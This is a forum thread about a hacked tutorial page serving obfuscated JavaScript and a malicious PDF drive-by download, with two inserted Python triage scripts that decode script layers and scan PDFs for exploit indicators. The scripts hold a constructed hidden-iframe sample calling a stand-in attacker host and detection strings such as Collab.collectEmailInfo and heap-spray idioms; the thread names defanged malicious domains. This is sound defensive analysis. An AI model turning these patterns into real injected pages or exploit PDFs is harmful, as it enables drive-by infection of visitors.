Gizmos Freeware Reviews  

15. Sep 2009, 07:34 AM   #1
zanzizzi
Member
Join Date: Sep 2009
Posts: 9
Subject: mike dutch site linking to malware

Hi.

Last night I was having a look at the following site: http://mike.dutch.home.comcast.net/~mike.dutch/. I got the link somewhere here at Gizmo, I can't quite remember where exactly. The very first link that I clicked on was w(DONT CLICK)w[DOT]mapelli[DOT]info/tips/ultimate-google-search-tips-guide, in the tutorials section. As soon as the page opened my antivirus detected malware so I got out of there. I checked at mywot and a comment there also said the site contained a trojan.

I just wanted to let people know. Of course I don't know for sure that it is not a false positive.

Last edited by Anupam; 20. Jan 2010 at 03:59 PM. Reason: Edited link
15. Sep 2009, 07:54 AM   #2
Anupam
Moderator
Join Date: Jul 2008
Location: India
Posts: 9,484

You are right. I use the NoScript add-on for Firefox, and Avast as my antivirus.

When I opened the page with NoScript on, the page opened without any problem. When I chose NoScript to temporarily allow the scripts on the site... Avast detects a problem with the site.

Shows how much NoScript can help in safe browsing. It's a must for any Firefox user. Also shows Avast is a good antivirus too.

Thanks for sharing this information about malware on the link. Appreciated.
__________________
Anupam
29. Dec 2009, 12:48 AM   #3
mikedutch
Guest
Posts: n/a
Subject: I'll take a look

Thanks for the heads up.

Every now and then Microsoft Word goes bonkers and swaps the links. For example, link1 goes down a few table entries. It's quite a hassle to fix (I have to redo the entire web page) so I don't do it very often. You can always get to the right link by cut & paste.

I've had a few issues where some links have gone "bad" over time. This means that what used to be valid websites may no longer be valid. I try to delete these so please continue letting me know of any infected links.

Thanks,
Mike
19. Jan 2010, 03:30 PM   #4
computerfreaker
Junior Member
Join Date: Jun 2009
Posts: 15

Quote:
Originally Posted by zanzizzi:
    Hi.

    Last night I was having a look at the following site: http://mike.dutch.home.comcast.net/~mike.dutch/. I got the link somewhere here at Gizmo, I can't quite remember where exactly. The very first link that I clicked on was w(DONT CLICK)w[DOT]mapelli[DOT]info/tips/ultimate-google-search-tips-guide, in the tutorials section. As soon as the page opened my antivirus detected malware so I got out of there. I checked at mywot and a comment there also said the site contained a trojan.

    I just wanted to let people know. Of course I don't know for sure that it is not a false positive.

You couldn't be more right.

I like taking out malware, so I went to take a look - Firefox went nuts, warning me that mapelli was a known attack site. I allowed it anyway (NoScript's protecting me) and looked at the page source; I found a nice piece of obfuscated JavaScript. JSUnpack shows that that piece of JS is calling a script on a Chinese domain, hxxp[COLON]//tdscounter[DOT]cn/phpbb/index.php.
I went directly to tdscounter and got another "Known attack site" warning; this time, I decided to let Sandboxie and Opera handle it (I'd use Fx, but Sandboxie & Firefox don't play well with ContentWatch).
I went to mapelli again, this time in a sandboxed Opera session, and Microsoft Forefront Client Security went nuts - "Exploit:Win32/Pdfjsc.CR detected". tdscounter is apparently pushing a drive-by download; I'm OK thanks to NoScript and Sandboxie (ironically, MFCS is going to be more of a pain than anything else, since it locks the infected file so I can't analyze it), but anybody who visited will definitely want to run a full-system virus scan.

Cheers!

Last edited by Anupam; 20. Jan 2010 at 04:01 PM. Reason: Edited link
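The post above walks through the usual first pass by hand: pull the page source, spot the obfuscated script block, decode it, and find the remote host it pulls from. The script below is added here as an example; it is not code from this thread, from JSUnpack, or from any other tool named in it. It does that first pass statically in Python: it peels the two encoding layers injected blocks of this kind most often use (unescape() over a percent-encoded string, and String.fromCharCode(...)), flags the usual wrapper markers, and reports any URL it finds in the forum's hxxp[COLON]//host[DOT]tld form so the report itself is not clickable. The page it scans and the host tds.attacker.example inside it are constructed for the example, not the real site discussed in the thread.

```python
import re
from urllib.parse import unquote

# Constructed sample page (not the real site from the thread). The injected
# block mimics the pattern discussed: a percent-encoded payload handed to
# unescape() and written into the page with document.write(). The host
# 'tds.attacker.example' is a placeholder, not a real domain.
SAMPLE_PAGE = """<html><head><title>Ultimate Google search tips</title></head>
<body><h1>Search tips</h1><p>Use quotes for exact phrases.</p>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Ftds.attacker.example%2Fphpbb%2Findex.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'))</script>
<script>eval(String.fromCharCode(118,97,114,32,120,61,49,59));</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe[^>]*(width\s*=\s*['\"]?0\b|height\s*=\s*['\"]?0\b|display\s*:\s*none)", re.I)

# Wrapper markers that commonly surround injected payloads. Each is benign on
# its own; several together in one short block is what earns a closer look.
INDICATORS = {
    "eval(": "eval",
    "unescape(": "unescape",
    "String.fromCharCode": "fromCharCode",
    "document.write(": "document.write",
}


def js_unescape(s):
    """JavaScript unescape(): %XX bytes plus the %uXXXX form Python's unquote lacks."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def find_scripts(html):
    """Inline <script> bodies, in document order."""
    return [m.group(1) for m in SCRIPT_RE.finditer(html)]


def decode_layers(script, max_rounds=5):
    """Peel the two simplest encoding layers until nothing changes.
    Obfuscators nest these, hence the loop; anything fancier (string
    splitting, arithmetic on char codes) needs a JavaScript sandbox."""
    text = script
    for _ in range(max_rounds):
        new = UNESCAPE_RE.sub(lambda m: js_unescape(m.group(2)), text)
        new = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).replace(" ", "").split(",") if n),
            new)
        if new == text:
            break
        text = new
    return text


def indicators_for(script):
    """Indicator names found in one script block, plus its decoded form."""
    found = [name for needle, name in INDICATORS.items() if needle in script]
    if len(re.findall(r"%[0-9a-fA-F]{2}", script)) >= 8:
        found.append("heavy percent-encoding")
    decoded = decode_layers(script)
    if HIDDEN_IFRAME_RE.search(decoded):
        found.append("hidden iframe after decoding")
    return found, decoded


def defang(url):
    """Render a URL the way this forum does so it cannot be clicked:
    hxxp[COLON]//host[DOT]tld/path (the path is left as-is)."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return f"{scheme.replace('http', 'hxxp')}[COLON]//{host.replace('.', '[DOT]')}{slash}{path}"


def triage(html):
    """One report entry per script block that shows indicators or external URLs."""
    report = []
    for i, script in enumerate(find_scripts(html)):
        found, decoded = indicators_for(script)
        urls = sorted({defang(u) for u in URL_RE.findall(decoded)})
        if found or urls:
            report.append({"script": i, "indicators": found, "urls": urls})
    return report


if __name__ == "__main__":
    for entry in triage(SAMPLE_PAGE):
        print(entry)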
19. Jan 2010, 03:58 PM   #5
computerfreaker
Junior Member
Join Date: Jun 2009
Posts: 15

EDIT: OK, let's try this again. Apparently my last post went into the moderation queue, so I'll post a quick summary here.
The mapelli site is definitely infected. Firefox warns it's an attack site; a look at its source code reveals some nicely obfuscated JavaScript. I deobfuscated the JS; it's coming from a Chinese site. Microsoft Forefront Client Security, my antivirus program, caught a drive-by download. I was running in a sandbox, though, so it can't hurt me.
That's probably a good enough summary for now; there was more detail in my original post, but I'm sure that original post will show up here shortly.

Anyway, I just got a look at the infected file - it's a malicious PDF. There's been a lot of those going around lately...

I'll drop this off at the SANS Internet Storm Center; in the meantime, for anyone who stumbled into this site, better run your virus scanner.

Last edited by computerfreaker; 19. Jan 2010 at 04:01 PM.
19. Jan 2010, 11:32 PM   #6
computerfreaker
Junior Member
Join Date: Jun 2009
Posts: 15

Yep, that was an infected PDF all right, and a whole lot more.
Here's the reply I just got from SANS:
Quote:
Originally Posted by SANS ISC:
    Hi,

    your sample exploits Collab.collectEmailInfo (and probably other Adobe vulnerabilities, too, I didn't check) and if successful downloads this exe:
    http://www.virustotal.com/en/analisi...4aa-1263920062 from hfgdcvehuno-dot-com
    Thanks for writing in!

VirusTotal flags that trojan .exe as a downloader, so I'll wager the victims of this have more than just an infected PDF and a trojan to worry about.

Can't say this enough: run at least a couple of good virus scanners, such as MalwareBytes Anti-Malware.

Nice catch, zanzizzi.
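The SANS reply above names the Reader API the PDF went after and the stage it fetched on success; nothing on the page shows how to check a PDF for that kind of content yourself. The script below is added here as an example and is not code from the thread, from SANS ISC, or from any named product. It builds a constructed minimal PDF whose JavaScript sits in a FlateDecode stream (as real samples do, which is why a plain grep for the API name comes back empty) and then scans it statically: it inflates the streams using each stream's declared /Length, undoes #xx hex escapes in names, and reports the auto-run names and the exploit-era strings it finds. The indicator lists are chosen for this example, not a vendor signature set; the sample JavaScript only names the API and is not an exploit.

```python
import re
import zlib

# Constructed sample JavaScript: it only names the API the SANS note says the
# real sample exploited, so the scanner has something to hit. Not an exploit.
SAMPLE_JS = "var s = unescape('%u9090'); Collab.collectEmailInfo({ subj: '', msg: s });"

# PDF name objects that give a document a way to run code or act on open.
NAME_INDICATORS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/EmbeddedFile"]
# Strings found inside the JavaScript of PDF exploits of that era: Reader API
# names with known bugs and the heap-spray idioms that surround them.
JS_INDICATORS = [b"Collab.collectEmailInfo", b"util.printf", b"Collab.getIcon",
                 b"unescape(", b"%u9090", b"%u0c0c"]

# Locates a stream via the /Length declared in its dictionary. Triage shortcut:
# a /Length given as an indirect object ("6 0 R") is not handled here.
STREAM_RE = re.compile(rb"/Length\s+(\d+)\b[^>]*>>\s*stream\r?\n")
HEX_NAME_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def build_sample_pdf(js):
    """Constructed minimal PDF: /OpenAction points at a JavaScript action whose
    code lives in a FlateDecode stream. No xref table; the scanner needs none."""
    compressed = zlib.compress(js.encode())
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /S /JavaScript /JS 5 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(compressed)
        + compressed + b"\nendstream",
    ]
    pdf = b"%PDF-1.4\n"
    for num, body in enumerate(objects, 1):
        pdf += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return pdf + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


def normalize_names(pdf):
    """Undo #xx hex escapes in names (/J#61vaScript -> /JavaScript), a cheap evasion."""
    return HEX_NAME_RE.sub(lambda m: bytes([int(m.group(1), 16)]), pdf)


def inflate_streams(pdf):
    """Every stream body, inflated when it is zlib data, raw otherwise."""
    out = []
    for m in STREAM_RE.finditer(pdf):
        raw = pdf[m.end(): m.end() + int(m.group(1))]
        try:
            out.append(zlib.decompress(raw))
        except zlib.error:
            out.append(raw)
    return out


def scan_pdf(pdf):
    """Static indicators only: what the file declares and what its streams contain."""
    names_blob = normalize_names(pdf)
    names = [n.decode() for n in NAME_INDICATORS
             if re.search(rb"(?<![A-Za-z])" + re.escape(n) + rb"(?![A-Za-z])", names_blob)]
    # Case-insensitive so odd casings (the SANS note wrote collectEMailInfo) still hit.
    blobs = [b.lower() for b in inflate_streams(pdf)] + [names_blob.lower()]
    js = [ind.decode() for ind in JS_INDICATORS if any(ind.lower() in b for b in blobs)]
    if js:
        verdict = "suspicious: exploit indicators in script"
    elif "/JavaScript" in names and ("/OpenAction" in names or "/AA" in names):
        verdict = "review: script runs automatically"
    else:
        verdict = "no static indicators"
    return {"names": names, "js": js, "verdict": verdict}


if __name__ == "__main__":
    print(scan_pdf(build_sample_pdf(SAMPLE_JS)))
```

Run as-is it prints the report for the constructed sample; hand scan_pdf() the bytes of a suspect file to triage it. A "suspicious" verdict justifies detonating the file in a sandbox and does not by itself prove exploitation; a miss proves nothing either, since an indirect /Length, chained filters and object streams are all outside this regex-level parser.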
20. Jan 2010, 04:07 PM   #7
Anupam
Moderator
Join Date: Jul 2008
Location: India
Posts: 9,484

Thanks for the detailed info computerfreaker. That was quite some detective work. Well, since the site in question is a known attack site, anyone using Firefox, or another good browser with anti-phishing and the like... should be safe. Firefox does not let the link open at all. Nevertheless, it's good to be aware.

Mike Dutch had said in an earlier post that he will look up the link and remove it, but it seems like he has not removed it yet, and the link still exists. He will have to be reminded again, so that some innocent user does not get infected.
__________________
Anupam
21. Jan 2010, 09:35 AM   #8
computerfreaker
Junior Member
Join Date: Jun 2009
Posts: 15

Quote:
Originally Posted by Anupam:
    Thanks for the detailed info computerfreaker. That was quite some detective work.

Actually, the PDF analysis came from the SANS ISC: http://isc.sans.org/
All I did was some JavaScript deobfuscating and some tracing.

Quote:
Originally Posted by Anupam:
    Well, since the site in question is a known attack site, anyone using Firefox, or another good browser with anti-phishing and the like... should be safe. Firefox does not let the link open at all. Nevertheless, it's good to be aware.

Well, in situations like this I'm always reminded of the famous saying: "Programmers keep trying to build bigger and better *****-proof programs; the Universe keeps trying to build bigger and better *****s. So far, the Universe is winning."
Some people are bound to get hit regardless of what else happens, hence my suggestion to run an AV app or two.
EDIT: sorry, the word filter ate part of my quote. Wonder what's up with that, as I didn't consider that a bad word... :S

Even though Firefox blocks the link, I have to wonder how IE users will fare, especially since IE is well-known for being receptive to drive-bys.

Quote:
Originally Posted by Anupam:
    Mike Dutch had said in an earlier post that he will look up the link and remove it, but it seems like he has not removed it yet, and the link still exists. He will have to be reminded again, so that some innocent user does not get infected.

Meanwhile, I'll do some analysis of that site and see if I can get its ISP to pull it down. I've had limited success doing that before, but still, it's worth a shot.

Also, I noticed you further edited my link. How should I post such links in the future? I've always used hxxp:// in the past with no trouble, but I'm more than happy to accommodate requirements here.

Cheers!

computerfreaker
__________________
With great power comes great responsibility.
21. Jan 2010, 09:50 AM   #9
Anupam
Moderator
Join Date: Jul 2008
Location: India
Posts: 9,484

Quote:
Originally Posted by computerfreaker:
    Even though Firefox blocks the link, I have to wonder how IE users will fare, especially since IE is well-known for being receptive to drive-bys.

Latest versions of all modern browsers with anti-attack and anti-phishing abilities should be able to block such sites. I am sure IE8 has such a feature too, although I haven't checked. Can't say about the older versions of IE, or other browsers, if they will be able to block such links.

Quote:
Originally Posted by computerfreaker:
    Meanwhile, I'll do some analysis of that site and see if I can get its ISP to pull it down. I've had limited success doing that before, but still, it's worth a shot.

I think you should wait on that. We will contact Mike Dutch, and ask him to remove the link again. His site is useful with a lot of links to good software. In fact, he has made a very exhaustive list. Some bad links might have got into the list. We will ask him again to remove the link, and he should comply. So, hold it.

Quote:
Originally Posted by computerfreaker:
    Also, I noticed you further edited my link. How should I post such links in the future? I've always used hxxp:// in the past with no trouble, but I'm more than happy to accommodate requirements here.

Yes, I had edited the link further, just to be sure. Here on the forum, and site, we use [COLON] and [DOT] to kill the links, and also do not post it in a link format.
__________________
Anupam
21. Jan 2010, 12:11 PM   #10
computerfreaker
Junior Member
Join Date: Jun 2009
Posts: 15

Quote:
Originally Posted by Anupam:
    Latest versions of all modern browsers with anti-attack and anti-phishing abilities should be able to block such sites. I am sure IE8 has such a feature too, although I haven't checked. Can't say about the older versions of IE, or other browsers, if they will be able to block such links.

Glad to hear IE8 will handle that site, but I wonder about IE6 - it's still pretty popular (although Aurora is likely to change that in a hurry).

Quote:
Originally Posted by Anupam:
    I think you should wait on that. We will contact Mike Dutch, and ask him to remove the link again. His site is useful with a lot of links to good software. In fact, he has made a very exhaustive list. Some bad links might have got into the list. We will ask him again to remove the link, and he should comply. So, hold it.

Sorry, I didn't express myself clearly. I was going to see about having the malware site taken down, *not* Mike's.
As it is, that site looks like a legit site that's been hacked; a whois returned the owner's contact info, so I've dropped him an e-mail warning him of the hack.
EDIT: the site owner knows about the hack and is cleaning his site up.
Quote:
    Thank you very much.

    I was trying to clean up the code, but I was not able to find the source of the malicious content!

    thanks for the precious hint!

I'm going to try to help him with the cleanup; Mike can probably leave his link there, since the infected site should be disinfected shortly.
EDIT 2: Just dropped the site owner a note specifying how to remove the malicious JavaScript the hacker left. With any luck, the site should be clean soon.

Quote:
Originally Posted by Anupam:
    Yes, I had edited the link further, just to be sure. Here on the forum, and site, we use [COLON] and [DOT] to kill the links, and also do not post it in a link format.

Ok, thanks. I'll keep that in mind for the future.

Cheers!

computerfreaker
__________________
With great power comes great responsibility.